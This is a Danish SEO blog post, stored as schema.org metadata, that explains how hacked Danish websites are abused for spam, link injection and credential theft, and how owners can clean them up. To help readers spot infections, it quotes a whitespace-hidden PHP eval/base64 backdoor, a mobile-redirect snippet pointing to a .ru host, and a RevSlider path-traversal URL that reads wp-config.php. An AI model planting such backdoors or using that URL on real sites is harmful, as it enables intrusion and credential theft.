[{"@context":"https:\/\/schema.org\/","@type":"BlogPosting","@id":"https:\/\/blog.onlinemarketing.dk\/hacker-og-hackerangreb-paa-danske-websider.html#BlogPosting","mainEntityOfPage":"https:\/\/blog.onlinemarketing.dk\/hacker-og-hackerangreb-paa-danske-websider.html","headline":"Hacker og hackerangreb p\u00e5 Danske websider","name":"Hacker og hackerangreb p\u00e5 Danske websider","description":"Hacking er ved at v\u00e6re et problem for danske websider Ser dit website s\u00e5dan ud, n\u00e5r Googles spider kommer forbi? Og den almindelige bruger ser&hellip;","datePublished":"2014-11-09","dateModified":"2015-04-22","author":{"@type":"Person","@id":"https:\/\/blog.onlinemarketing.dk\/author\/admin#Person","name":"Ren\u00e9 Madsen","url":"https:\/\/blog.onlinemarketing.dk\/author\/admin","identifier":1,"description":"Jeg hedder Ren\u00e9 Madsen og grundlagde Online Marketing i 1995. Siden 1999 har jeg arbejdet professionelt med SEO og har fulgt udviklingen fra de f\u00f8rste s\u00f8gemaskiner til nutidens AI-baserede s\u00f8gning.\r\n\r\nJeg arbejder med teknisk SEO, GEO (Generative Engine Optimization), AI Discovery og digital synlighed. Gennem \u00e5rene har jeg r\u00e5dgivet b\u00e5de sm\u00e5 og store virksomheder i Danmark og internationalt med fokus p\u00e5 langsigtede l\u00f8sninger, teknisk kvalitet og dokumenterede resultater.\r\n\r\nP\u00e5 denne blog deler jeg analyser, erfaringer og historiske perspektiver fra mere end 25 \u00e5r i branchen. Mit m\u00e5l er at forklare, hvordan s\u00f8gemaskiner, AI og internettet udvikler sig \u2013 baseret p\u00e5 praktisk erfaring, dokumentation og egne erfaringer gennem branchens udvikling.\r\n\r\nVed siden af mit arbejde har jeg dyrket Kyokushin karate siden 1973 og er i dag Shihan, 5. dan. Karate har l\u00e6rt mig v\u00e6rdien af disciplin, vedholdenhed og konstant udvikling \u2013 principper, som ogs\u00e5 pr\u00e6ger mit arbejde med SEO og digital strategi.","image":{"@type":"ImageObject","@id":"https:\/\/secure.gravatar.com\/avatar\/ce65f41ecd392d9b2ef547aba58da9858a8cfb78bd54ce7a6acbffad581f31b2?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/ce65f41ecd392d9b2ef547aba58da9858a8cfb78bd54ce7a6acbffad581f31b2?s=96&d=mm&r=g","height":96,"width":96}},"publisher":{"@type":"Organization","name":"Online Marketing","logo":{"@type":"ImageObject","@id":"https:\/\/blog.onlinemarketing.dk\/wp-content\/uploads\/2017\/05\/onlinemarketing_logo_mini.gif","url":"https:\/\/blog.onlinemarketing.dk\/wp-content\/uploads\/2017\/05\/onlinemarketing_logo_mini.gif","width":600,"height":60}},"image":{"@type":"ImageObject","@id":"https:\/\/blog.onlinemarketing.dk\/wp-content\/uploads\/2014\/11\/hackerangreb.jpg","url":"https:\/\/blog.onlinemarketing.dk\/wp-content\/uploads\/2014\/11\/hackerangreb.jpg","height":"500","width":"525"},"url":"https:\/\/blog.onlinemarketing.dk\/hacker-og-hackerangreb-paa-danske-websider.html","about":["Internettet"],"wordCount":1429,"articleBody":"Hacking er ved at v\u00e6re et problem for danske websiderSer dit website s\u00e5dan ud, n\u00e5r Googles spider kommer forbi? Og den almindelige bruger ser din rigtige side?Der har igennem flere \u00e5r v\u00e6ret mange indbrudsfors\u00f8g p\u00e5 danske hjemmesider, men i forhold til tidligere, s\u00e5 er niveauet af den m\u00e5de hackerne udnytter for\u00e6ldet software p\u00e5 blevet effektiviseret fra hackernes side.Tidligere var det normalt at inds\u00e6tte politisk propaganda og lignende p\u00e5 websites, som gav de enkelte hackere et klap p\u00e5 skulderen, der blev sj\u00e6ldent foretaget noget, der kompromitterede websitet og \u00f8delage noget for de ber\u00f8rte webstedsejere.Over tid er der sket et skred p\u00e5 dette omr\u00e5de, i dag handler det om business, BIG- business, hvor der spilles p\u00e5 flere tangenter, og de kompromitterede websites udnyttes fuld ud til forretning for hackerne.N\u00e5r en hacker g\u00e5r ind p\u00e5 et website i dag drejer det sig om bla. at f\u00e5 adgang til webstedes e-mail funktion, hvorfra der kan sendes spammail ud til deres kundekreds, og det kan v\u00e6re store m\u00e6ngder spam, der leveres fra virksomheder, der bare tror de har en hjemmeside liggende. \u00a0Dette kan ikke ses fra deres e-mail konto, det foreg\u00e5r typisk via serverens mailfunktion f.eks. via exim4 og lign. mailprogrammer p\u00e5 serveren (Det er den software der leverer de interne systembeskeder og sender formmail fra f.eks. WordPress til kundes normale e-mail adresse).\u00a0 Serverens mailfunktion kan kontrolleres af hackeren via enkelte filer, som selv henter mail efter et fastlagt skema og udsender dem efter deres \u00f8nsker og behov.Det n\u00e6ste store problem er at der inds\u00e6ttes tekstsider med et netv\u00e6rk af links og popup til sider, der handler om sex, spil, l\u00e5n, kasino, medicin og lignende produkter. Omfanget af indsatte sider er k\u00e6mpestort, der er ikke kun tale om en eller to filer der kompromitteret.Jeg har oplevet at der p\u00e5 flere websites var langt over 100 filer, der var kompromitteret med hackerkode, som ved et kald p\u00e5 de enkelte filer udefra p\u00e5 en eksisterende php side, geninstallerede hele chokoladebutikken igen, &#8211; og med samme biblioteksstruktur. S\u00e5 det er ikke s\u00e5 nemt at fjerne, n\u00e5r man tror det er v\u00e6k, s\u00e5 ligger det der igen, n\u00e5r en af de ber\u00f8rte sider kaldes.Der har s\u00e5 ogs\u00e5 bredt sig en trend indenfor at installere software, der direkte ber\u00f8rer de brugere, der benytter sitet, her er der tale om skadelig software, der skal aflure brugeren og evt. sende informationerne videre til hackernetv\u00e6rket med password login etc.Hvad skal man stille op med disse hackerangreb?Hvis et site f\u00f8rst er kompromitteret, s\u00e5 skal det renses fuldst\u00e6ndigt og f\u00f8dek\u00e6den skal findes og stoppes ellers er det v\u00e6rdil\u00f8st at udf\u00f8re.F\u00f8rst skal det unders\u00f8ges om \u201djeg\u201d er den eneste, der ligger p\u00e5 den server, der er hacket? Er der flere? S\u00e5 skal du have din udbyder med i renseopgaven, ellers vil det aldrig lykkedes for dig at komme ud af det igen.Mange af de websites, der hackes, er hacket fra webroden p\u00e5 serveren, hvilket betyder hackerne har adgang til alle de sider, der ligger her, og der kan v\u00e6re tale om flere hundrede sites, der ligger p\u00e5 samme box. Her kan du ikke hj\u00e6lpe til med noget, der skal udbyderen ind over.Derfor skal det unders\u00f8ges hvor stort omfanget af hackerangrebet erEn r\u00e6kkef\u00f8lge ser s\u00e5dan ud.Gennemgang af serverlogGennemgang af fejllogGennemgang af maillog p\u00e5 serverenUdelukkelse af IP adresser, der har foretaget mist\u00e6nkelig adf\u00e6rd. (se 1.)Begynd cleaning af server, MySQL databaser og de enkelte webstederOpdater serversoftwareOpdater de forskellig CMS systemerSikre serveren eks. Unix box med Apache- brug \u00a0mod_security og mod_evasiveS\u00e6t de rigtige permission p\u00e5 de forskellige websites, Aldrig 777, normalt 755 til biblioteker og 644 til filer.S\u00e6t i drift og hold \u00f8je fremadrettet med serverlog etc.Udskift alle password til server, MySQL og de enkelte websteder, inds\u00e6t evt. login via 2 trin med forskellig kode.( 1. )Mist\u00e6nkelig adf\u00e6rd er mange login fors\u00f8g p\u00e5 samme konti hurtigt efter hinanden og loginfors\u00f8g sammensat med parameterstyring som f.eks.GET \/section\/wp-login.php HTTP\/1.1&#8243;GET \/wp-login.php?action=register HTTP\/1.1 (Mange fors\u00f8g fra samme IP addresser)GET \/administrator\/index.php?option=com_login HTTP\/1.1GET \/administrator\/index.phpDenne giver direkte adgang til database med password og hele pivt\u00f8jet.:\/wp-admin\/admin-ajax.php?action=revslider_show_image&amp;img=..\/wp-config.phpHvis webstedets database ikke er sikret, s\u00e5 kan hele databasen l\u00e6ses via ovenn\u00e6vnte link!!!V\u00e6r opm\u00e6rksom p\u00e5 at anvende en backup, der er taget i sidste uge f\u00f8r hackerangrebet, kan v\u00e6re totalt nyttel\u00f8st.Hackernes proces bygger p\u00e5 at de har automatisk software, der fors\u00f8ger at komme ind alle de steder de kan p\u00e5 deres vej, s\u00e5 serveren kan v\u00e6re kompromitteret for mange m\u00e5neder siden, men hvor selve kompromitteringen f\u00f8rst er aktiveret nu, s\u00e5 ved at tro en 7 dage gammel kopi l\u00f8ser problemet kan v\u00e6re en stakkels frist, hvor det starter forfra igen.&nbsp;Hvordan finder jeg det kode der skaber problemerne?Hacking kan v\u00e6re foretaget p\u00e5 mange m\u00e5der, de dygtige hackere efterlader n\u00e6sten ingen spor, datoer p\u00e5 Rodmapper (dem du kan se via FTP) de er ikke gemt med nye datoer, men gemt med de gamle datoer og samme klokkesl\u00e6t som de andre filer, der ligger i CMS systemernes mapper. S\u00e5 de kan ikke identificeredes via dato og klokkesl\u00e6t.Se f\u00f8rst og fremmest efter nye filnavne, du ikke kender. Der bruges tit filnavne som update.php &#8211; network.php &#8211; \u00a0nav-menus.php\u00a0 &#8211; jce.php &#8211; css.php &#8211; filesystem.php &#8211;\u00a0jsconfig.php &#8211;\u00a0mysqli.php &#8211; level.php &#8211; parser.php &#8211; db.php &#8211; user.php &#8211; themes.php &#8211; gs.php &#8211; searchinfo.php &#8211; theme.php &#8211; file.php &#8211; model.php &#8211; info.php og lignende.\u00a0 ( F\u00e5 en der kan l\u00e6se kode med i opgaven, disse filnavne bruges helt legitimt i flere biblioteker, og skal v\u00e6re der) men det skaber forvirring, at der ligger typer som disse i andre biblioteker, derfor sletter folk dem ikke og hackerkoden ligger s\u00e5 latent p\u00e5 websitet.Et andet trick er placering af en kode baseret p\u00e5 eval og base 64 krypterede koder placeret i eksisterende filer. Denne kode placeres typisk i linje et i filen, og der er indsat flere tusinde mellemrum, s\u00e5ledes at teksten i filen ser normal ud n\u00e5r den \u00e5bnes i f.eks. Notesblok, men ved at k\u00f8re cursoren helt til h\u00f8jre, s\u00e5 vil selve PHP kommandoen og koden fremkomme. Denne metode har snydt mange, s\u00e5 se godt for n\u00e5r filerne gennems\u00f8ges. N\u00e5r hackerens kode er fundet, s\u00e5 kan der p\u00e5 serverniveau s\u00f8ges efter lignende tekststrenge og de kan s\u00e5 fjernes i et hug.En streng kan se s\u00e5ledes ud.:# &lt;\u00a0 ? \u00a0 php \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 eval (base64_decode ($_POST[&#8216;n726b60&#8217;]));?&gt;Bem\u00e6rk, det lange mellemrum mellem php start og selve koden, der kommunikerer med anden indlagt base 64 kodet software, som er placeret p\u00e5 serveren.Det kan se s\u00e5ledes ud.:Koder som disse kan ligeledes findes i filer forskellige steder.:# &lt;\u00a0 ?\u00a0\u00a0\u00a0\u00a0 php# $ ua = $_SERVER[&#8216;HTTP_USER_AGENT&#8217;];# if (stripos (&#8220;***$ua&#8221;,&#8217;android&#8217;) !== false){# header (&#8220;Location: http:\/\/\u00a0\u00a0 mob-version . ru\/&#8221;);# die();Hacking, s\u00f8gemaskineoptimering og placering i s\u00f8gemaskinerneDet siger n\u00e6sten sig selv, at et hacket website med mange links ud til forskellige sex, spille, l\u00e5nefinansieringssider ikke er med til at skabe den store trust i forhold til Google. S\u00e5 det er ligesom andre parametre i dag vigtigt at holde sit website clean.&nbsp;Hvor stort er omfanget af Danske websites der er Hacket?Omfanget er v\u00e6sentligt st\u00f8rre end man regner med, det kan godt ligge et sted imellem 40 &#8211; 50.000 websites, der er kompromitterede i Danmark alene pt.&nbsp;S\u00e5dan ser resultaterne ud efter et angreb i Googles s\u00f8geresultater.&nbsp;&nbsp;Websites ejer har f\u00e5et sendt en mail om problemerne, s\u00e5 de bliver helt sikkert l\u00f8st.Alle kan blive ramt, det handler om software, der st\u00e5r piv\u00e5bent forskellige steder. Det er webhosting- IT- virksomheder ikke herre over, men m\u00e5 ty til leverand\u00f8rerne af den software, der er installeret p\u00e5 deres servere.Desv\u00e6rre findes der konstant nye indgange til servere via d\u00e5rlig kodning i serversoftware og applikationer. Dette betyder at alle skal v\u00e6re ekstra p\u00e5 vagt.&nbsp;Relaterede emner:Danske BankHacker angreb p\u00e5 WebhotellerHacker angreb p\u00e5 et af landets store webhoteller"},{"@context":"https:\/\/schema.org\/","@type":"BreadcrumbList","itemListElement":[{"@type":"ListItem","position":1,"name":"Hacker og hackerangreb p\u00e5 Danske websider","item":"https:\/\/blog.onlinemarketing.dk\/hacker-og-hackerangreb-paa-danske-websider.html#breadcrumbitem"}]}]